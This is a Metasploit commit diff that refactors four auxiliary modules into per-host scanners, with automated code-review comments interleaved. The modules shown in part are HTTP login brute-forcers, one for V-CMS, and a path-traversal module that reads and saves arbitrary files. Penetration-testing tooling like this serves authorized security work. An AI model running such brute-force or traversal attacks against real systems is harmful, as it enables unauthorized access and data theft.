modules living inside scanner should include the Scanner mixin

bug/bundler_fix
jvazquez-r7 2014-06-12 12:20:44 -05:00
parent 67d4097e1d
commit e85f829ee4
4 changed files with 39 additions and 23 deletions


@ -10,6 +10,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::AuthBrute include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Scanner
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
@ -39,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary
def get_sid_token def get_sid_token
res = send_request_raw({ res = send_request_raw({
'method' => 'GET', 'method' => 'GET',
'uri' => normalize_uri(@uri.path) 'uri' => normalize_uri(@uri)
}) })
return [nil, nil] if res.nil? || res.get_cookies.empty? return [nil, nil] if res.nil? || res.get_cookies.empty?
@ -62,7 +63,7 @@ class Metasploit3 < Msf::Auxiliary
# #
sid, token = get_sid_token sid, token = get_sid_token
if sid.nil? or token.nil? if sid.nil? or token.nil?
print_error("#{peer} - Unable to obtain session ID or token, cannot continue") vprint_error("#{peer} - Unable to obtain session ID or token, cannot continue")
return :abort return :abort
else else
vprint_status("#{peer} - Using sessiond ID: #{sid}") vprint_status("#{peer} - Using sessiond ID: #{sid}")
@ -72,7 +73,7 @@ class Metasploit3 < Msf::Auxiliary
begin begin
res = send_request_cgi({ res = send_request_cgi({
'method' => 'POST', 'method' => 'POST',
'uri' => normalize_uri("#{@uri.path}index.php"), 'uri' => normalize_uri("#{@uri}index.php"),
'cookie' => sid, 'cookie' => sid,
'vars_post' => { 'vars_post' => {
'token' => token, 'token' => token,
@ -91,7 +92,7 @@ class Metasploit3 < Msf::Auxiliary
end end
if res.nil? if res.nil?
print_error("#{peer} - Connection timed out") vprint_error("#{peer} - Connection timed out")
return :abort return :abort
end end
@ -116,8 +117,12 @@ class Metasploit3 < Msf::Auxiliary
def run def run
@uri = target_uri.path @uri = target_uri.path
@uri.path << "/" if @uri.path[-1, 1] != "/" @uri << "/" if @uri[-1, 1] != "/"
super
end
def run_host(ip)
each_user_pass { |user, pass| each_user_pass { |user, pass|
vprint_status("#{peer} - Trying \"#{user}:#{pass}\"") vprint_status("#{peer} - Trying \"#{user}:#{pass}\"")
do_login(user, pass) do_login(user, pass)
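Review bot: The login POST builds its path by string interpolation, `normalize_uri("#{@uri}index.php")`, which only works because `run` has already forced a trailing slash onto `@uri`. Passing the segments separately, `'uri' => normalize_uri(@uri, 'index.php'),`, lets the helper do the joining and matches the `normalize_uri(uri, 'index.php')` form used in another file of this commit. The enclosing method starts and ends outside the hunk, so this is based only on the visible request hash.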


@ -10,6 +10,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::AuthBrute include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Scanner
def initialize(info={}) def initialize(info={})
super(update_info(info, super(update_info(info,
@ -55,11 +56,11 @@ class Metasploit3 < Msf::Auxiliary
}) })
if not res if not res
print_error("#{peer} - Connection timed out") vprint_error("#{peer} - Connection timed out")
return :abort return :abort
end end
rescue ::Rex::ConnectionError, Errno::ECONNREFUSED rescue ::Rex::ConnectionError, Errno::ECONNREFUSED
print_error("#{peer} - Failed to response") vprint_error("#{peer} - Failed to response")
return :abort return :abort
end end
@ -79,7 +80,7 @@ class Metasploit3 < Msf::Auxiliary
end end
def run def run_host(ip)
if anonymous_access? if anonymous_access?
print_status("#{peer} - No login necessary. Server allows anonymous access.") print_status("#{peer} - No login necessary. Server allows anonymous access.")
return return
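Review bot: The rescue branch drops the exception and logs `Failed to response`, which is ungrammatical and does not say whether the connection was refused or reset. That detail matters more now that the module runs per host and the message is verbose-only. Consider `rescue ::Rex::ConnectionError, Errno::ECONNREFUSED => e` followed by `vprint_error("#{peer} - Connection failed: #{e.message}")`. The enclosing method starts outside the hunk, so any further handling is not visible here.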


@ -8,6 +8,7 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
@ -41,13 +42,13 @@ class Metasploit3 < Msf::Auxiliary
], self.class) ], self.class)
end end
def run def run_host(ip)
uri = target_uri.path uri = target_uri.path
uri << '/' if uri[-1, 1] != '/' uri << '/' if uri[-1, 1] != '/'
t = "/.." * datastore['DEPTH'] t = "/.." * datastore['DEPTH']
print_status("Retrieving #{datastore['FILE']}") vprint_status("#{peer} - Retrieving #{datastore['FILE']}")
# No permission to access.log or proc/self/environ, so this is all we do :-/ # No permission to access.log or proc/self/environ, so this is all we do :-/
uri = normalize_uri(uri, 'index.php') uri = normalize_uri(uri, 'index.php')
@ -57,13 +58,14 @@ class Metasploit3 < Msf::Auxiliary
}) })
if not res if not res
print_error("Server timed out") vprint_error("#{peer} - Server timed out")
elsif res and res.body =~ /Error 404 requested page cannot be found/ elsif res and res.body =~ /Error 404 requested page cannot be found/
print_error("Either the file doesn't exist, or you don't have the permission to get it") vprint_error("#{peer} - Either the file doesn't exist, or you don't have the permission to get it")
else else
# We don't save the body by default, because there's also other junk in it. # We don't save the body by default, because there's also other junk in it.
# But we still have a SAVE option just in case # But we still have a SAVE option just in case
print_line(res.body) print_good("#{peer} - #{datastore['FILE']} retrieved")
vprint_line(res.body)
if datastore['SAVE'] if datastore['SAVE']
p = store_loot( p = store_loot(
@ -73,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary
res.body, res.body,
::File.basename(datastore['FILE']) ::File.basename(datastore['FILE'])
) )
print_status("File saved as: #{p}") print_good("#{peer} - File saved as: #{p}")
end end
end end
end end
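Review bot: The final `else` branch now prints `print_good("#{peer} - #{datastore['FILE']} retrieved")` for any response whose body lacks the 404 string, so a 403, a 500 or a redirect is reported as a successful read and, with SAVE set, stored as loot. Run as a scanner across many hosts, that produces false positives in the output and in the loot store. Check the status before the success branch, for example `elsif res.code != 200` with `vprint_error("#{peer} - Unexpected HTTP #{res.code}")`. Whether the application answers a successful read with 200 is an assumption to confirm against a real target.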


@ -10,14 +10,15 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::AuthBrute include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Scanner
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
'Name' => 'V-CMS Login Utility', 'Name' => 'V-CMS Login Utility',
'Description' => %q{ 'Description' => %q{
This module attempts to authenticate to an English-based V-CMS login interface. This module attempts to authenticate to an English-based V-CMS login interface. It
It should only work against version v1.1 or older, because these versions do not should only work against version v1.1 or older, because these versions do not have
have any default protections against bruteforcing. any default protections against bruteforcing.
}, },
'Author' => [ 'sinn3r' ], 'Author' => [ 'sinn3r' ],
'License' => MSF_LICENSE 'License' => MSF_LICENSE
@ -31,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
File.join(Msf::Config.data_directory, "wordlists", "http_default_users.txt") ]), File.join(Msf::Config.data_directory, "wordlists", "http_default_users.txt") ]),
OptPath.new('PASS_FILE', [ false, "File containing passwords, one per line", OptPath.new('PASS_FILE', [ false, "File containing passwords, one per line",
File.join(Msf::Config.data_directory, "wordlists", "http_default_pass.txt") ]), File.join(Msf::Config.data_directory, "wordlists", "http_default_pass.txt") ]),
OptString.new('TARGETURI', [true, 'The URI path to dolibarr', '/vcms2/']) OptString.new('TARGETURI', [true, 'The URI path to V-CMS', '/vcms2/'])
], self.class) ], self.class)
end end
@ -39,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary
def get_sid def get_sid
res = send_request_raw({ res = send_request_raw({
'method' => 'GET', 'method' => 'GET',
'uri' => @uri.path 'uri' => @uri
}) })
# Get the PHP session ID # Get the PHP session ID
@ -52,6 +53,11 @@ class Metasploit3 < Msf::Auxiliary
def do_login(user, pass) def do_login(user, pass)
begin begin
sid = get_sid sid = get_sid
if sid.nil?
vprint_error("#{peer} - Failed to get sid")
return :abort
end
res = send_request_cgi({ res = send_request_cgi({
'uri' => "#{@uri}process.php", 'uri' => "#{@uri}process.php",
'method' => 'POST', 'method' => 'POST',
@ -62,9 +68,7 @@ class Metasploit3 < Msf::Auxiliary
'sublogin' => '1' 'sublogin' => '1'
} }
}) })
location = res.headers['Location'] location = res.headers['Location']
res = send_request_cgi({ res = send_request_cgi({
'uri' => location, 'uri' => location,
'method' => 'GET', 'method' => 'GET',
@ -87,7 +91,7 @@ class Metasploit3 < Msf::Auxiliary
return :skip_user return :skip_user
when /Invalid password/ when /Invalid password/
vprint_status("#{peer} - Username found: #{user}") vprint_status("#{peer} - Username found: #{user}")
else /\<a href="process\.php\?logout=1"\>/ when /\<a href="process\.php\?logout=1"\>/
print_good("#{peer} - Successful login: \"#{user}:#{pass}\"") print_good("#{peer} - Successful login: \"#{user}:#{pass}\"")
report_auth_info({ report_auth_info({
:host => rhost, :host => rhost,
@ -107,8 +111,12 @@ class Metasploit3 < Msf::Auxiliary
def run def run
@uri = normalize_uri(target_uri.path) @uri = normalize_uri(target_uri.path)
@uri.path << "/" if @uri.path[-1, 1] != "/" @uri << "/" if @uri[-1, 1] != "/"
super
end
def run_host(ip)
each_user_pass { |user, pass| each_user_pass { |user, pass|
vprint_status("#{peer} - Trying \"#{user}:#{pass}\"") vprint_status("#{peer} - Trying \"#{user}:#{pass}\"")
do_login(user, pass) do_login(user, pass)
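Review bot: In `do_login`, `location = res.headers['Location']` still dereferences `res` without a nil check, although the commit adds one for `sid` a few lines above. If the login POST times out, `res` is presumably nil (the other modules in this commit test `res.nil?` after the same call) and this line would raise unless a rescue outside the hunk catches it. Add the guard used there before reading the header: `if res.nil?`, then `vprint_error("#{peer} - Connection timed out")` and `return :abort`. A response without a `Location` header also leaves `location` nil for the follow-up GET, so that case deserves an explicit branch too.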